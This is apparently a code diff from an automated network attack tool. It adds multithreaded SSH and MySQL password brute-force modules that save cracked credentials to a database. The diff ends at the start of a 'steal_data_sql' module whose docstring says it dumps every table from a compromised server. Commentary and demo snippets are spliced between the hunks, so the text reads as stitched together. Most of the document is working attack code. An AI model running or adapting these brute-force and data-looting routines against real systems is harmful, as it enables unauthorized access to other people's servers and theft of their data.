user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('sql',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='sql'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread to process SQL bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_sql", 0) > 0:
time.sleep(self.shared_data.timewait_sql)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# for each database found, create/update a row in creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
try:
self.shared_data.db.insert_cred(
service="sql",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=dbname,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=dbname
)
else:
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
self.results = []
def remove_duplicates(self):
# unnecessary with the unique index; kept for compatibility.
pass
if __name__ == "__main__":
try:
sd = SharedData()
sql_bruteforce = SQLBruteforce(sd)
logger.info("SQL brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
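The `_fallback_upsert_cred` pattern used above (an `INSERT OR IGNORE` followed by an unconditional `UPDATE` inside one transaction) can be exercised against plain `sqlite3`. The table definition below is a simplified stand-in for the real `creds` schema, not the project's actual DDL:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE creds(
        service TEXT, mac_address TEXT, ip TEXT, hostname TEXT,
        "user" TEXT, "password" TEXT, port INTEGER, "database" TEXT,
        extra TEXT, last_seen TEXT,
        UNIQUE(service, mac_address, ip, "user", "database", port)
    )
""")

def upsert_cred(conn, *, service, mac, ip, hostname, user, password, port, database=""):
    # Insert-or-update without naming ON CONFLICT columns, as in
    # _fallback_upsert_cred: INSERT OR IGNORE, then an unconditional UPDATE.
    with conn:  # single transaction
        conn.execute(
            """INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
               VALUES(?,?,?,?,?,?,?,?,NULL)""",
            (service, mac, ip, hostname, user, password, port, database),
        )
        conn.execute(
            """UPDATE creds SET "password"=?, last_seen=CURRENT_TIMESTAMP
               WHERE service=? AND mac_address=? AND ip=? AND "user"=? AND "database"=? AND port=?""",
            (password, service, mac, ip, user, database, port),
        )

upsert_cred(conn, service="sql", mac="aa:bb", ip="10.0.0.5", hostname="db1",
            user="root", password="old", port=3306, database="shop")
upsert_cred(conn, service="sql", mac="aa:bb", ip="10.0.0.5", hostname="db1",
            user="root", password="new", port=3306, database="shop")
rows = conn.execute('SELECT "password", COUNT(*) FROM creds').fetchone()
print(rows)  # ('new', 1): the second call updated the row instead of duplicating it
```

Because the uniqueness check is delegated to the index rather than an `ON CONFLICT` column list, this works even when the unique index is built on expressions such as `COALESCE()`.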


@@ -1,204 +0,0 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# First attempt without specifying a database
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# If the connection succeeds, fetch the list of databases
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Save the information along with the list of databases found
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Add one entry per database found
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
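Both the old and new connectors share the same concurrency shape: fill a `Queue` with `(user, password)` attempts, start a bounded pool of worker threads, and `join()` the queue. A stripped-down sketch of that pattern, with a stub `try_login` standing in for the real SQL/SSH connector (the `VALID` set is purely illustrative):

```python
import threading
from queue import Queue, Empty

VALID = {("admin", "letmein")}  # stand-in for the remote service

def try_login(user, password):
    return (user, password) in VALID

def bruteforce(users, passwords, thread_count=4):
    q = Queue()
    hits, lock = [], threading.Lock()
    for u in users:
        for p in passwords:
            q.put((u, p))

    def worker():
        while True:
            try:
                u, p = q.get_nowait()  # non-blocking: avoids hanging on a drained queue
            except Empty:
                break
            try:
                if try_login(u, p):
                    with lock:
                        hits.append((u, p))
            finally:
                q.task_done()  # always acknowledge, even on error

    threads = [threading.Thread(target=worker, daemon=True)
               for _ in range(min(thread_count, max(1, q.qsize())))]
    for t in threads:
        t.start()
    q.join()   # wait until every queued attempt is processed
    for t in threads:
        t.join()
    return hits

print(bruteforce(["root", "admin"], ["toor", "letmein"]))  # [('admin', 'letmein')]
```

The `get_nowait()`/`Empty` loop sidesteps the race in the original `while not self.queue.empty(): self.queue.get()` form, where a worker can block forever on `get()` if another thread drains the last item between the check and the fetch.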

actions/ssh_bruteforce.py

@@ -0,0 +1,327 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.
SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
import os
import paramiko
import socket
import threading
import logging
import time
import datetime
from queue import Queue
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
# Silence Paramiko internals
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
"paramiko.kex", "paramiko.auth_handler"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70 # adjust the priority here if needed
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SSHBruteforce:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_bruteforce = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""Run the SSH brute force attack on the given IP and port."""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Execute the brute force attack and update status (for UI badge)."""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjorn_orch_status = "SSHBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""Handles the connection attempts and DB persistence."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Load wordlists (unchanged behavior)
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Build initial IP -> (MAC, hostname) cache from DB
self._ip_to_identity = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------
def _refresh_ip_identity_cache(self):
"""Load IPs from DB and map them to (mac, current_hostname)."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---- File utils ----------------------------------------------------------
@staticmethod
def _read_lines(path: str):
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---- SSH core ------------------------------------------------------------
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try:
ssh.connect(
hostname=adresse_ip,
username=user,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
look_for_keys=False, # avoid slow key probing
allow_agent=False, # avoid SSH agent delays
)
return True
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
return False
except Exception as e:
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
return False
finally:
try:
ssh.close()
except Exception:
pass
# ---- Robust DB upsert fallback ------------------------------------------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
"""
Insert-or-update without relying on ON CONFLICT columns.
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
"""
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
# 1) Insert if missing
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ssh',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
# 2) Update password/hostname if present (or just inserted)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ssh'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---- Worker / Queue / Threads -------------------------------------------
def worker(self, success_flag):
"""Worker thread to process items in the queue (bruteforce attempts)."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ssh_connect(adresse_ip, user, password, port=port):
with self.lock:
# Persist success into DB.creds
try:
self.shared_data.db.insert_cred(
service="ssh",
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
# Specific fix: fallback manual upsert
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None
)
else:
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
time.sleep(self.shared_data.timewait_ssh)
def run_bruteforce(self, adresse_ip, port):
"""
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("SSH brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
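`run_bruteforce` drives a two-phase plan from `merged_password_plan`: a quick dictionary phase, then an exhaustive fallback only if the first phase fails. The helper's real contract lives in `actions/bruteforce_common.py`; the version below is a hypothetical reimplementation of that split, shown only to make the phase logic concrete:

```python
def merged_password_plan(dictionary_passwords, all_passwords):
    """Split candidates into a fast dictionary phase and an exhaustive
    fallback phase, preserving order and dropping duplicates.

    Hypothetical sketch: the real actions/bruteforce_common.merged_password_plan
    takes shared_data and may differ.
    """
    seen = set()
    dict_phase = []
    for p in dictionary_passwords:
        if p not in seen:
            seen.add(p)
            dict_phase.append(p)
    # Fallback covers everything the dictionary phase did not already try.
    fallback = [p for p in all_passwords if p not in seen]
    return dict_phase, fallback

d, f = merged_password_plan(["123456", "admin"], ["admin", "letmein", "123456", "toor"])
print(d, f)  # ['123456', 'admin'] ['letmein', 'toor']
```

Keeping the two lists disjoint is what makes `total_tasks = len(users) * (len(dict_passwords) + len(fallback_passwords))` an accurate progress total.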


@@ -1,198 +0,0 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Starting SSH attack on port 22...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
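The DB-backed connectors all rebuild an IP-to-identity cache from the `hosts` table, where `ips` and `hostnames` are `;`-separated strings and the first hostname is treated as current. The parsing in `_refresh_ip_identity_cache` can be isolated into a pure function over plain dicts (the sample rows below are illustrative, not real data):

```python
def build_ip_identity(hosts_rows):
    """Map each IP to (mac, primary_hostname) from DB-style host rows.

    Mirrors _refresh_ip_identity_cache: 'ips' and 'hostnames' are
    ';'-separated; rows without a MAC address are skipped.
    """
    ip_to_identity = {}
    for r in hosts_rows:
        mac = r.get("mac_address") or ""
        if not mac:
            continue
        hostnames = r.get("hostnames") or ""
        current = hostnames.split(";", 1)[0] if hostnames else ""
        for ip in (p.strip() for p in (r.get("ips") or "").split(";")):
            if ip:
                ip_to_identity[ip] = (mac, current)
    return ip_to_identity

cache = build_ip_identity([
    {"mac_address": "aa:bb:cc", "hostnames": "nas;nas.lan", "ips": "10.0.0.5; 10.0.0.6"},
    {"mac_address": "", "hostnames": "ghost", "ips": "10.0.0.9"},  # skipped: no MAC
])
print(cache)  # {'10.0.0.5': ('aa:bb:cc', 'nas'), '10.0.0.6': ('aa:bb:cc', 'nas')}
```

On a cache miss, `mac_for_ip`/`hostname_for_ip` simply rebuild this mapping and retry, so newly discovered hosts are picked up without restarting the action.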


@@ -1,189 +1,252 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
import csv
from threading import Timer
from typing import List, Tuple, Dict, Optional
from sqlalchemy import create_engine, text
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 60 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "1/86400" # at most 1 execution/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
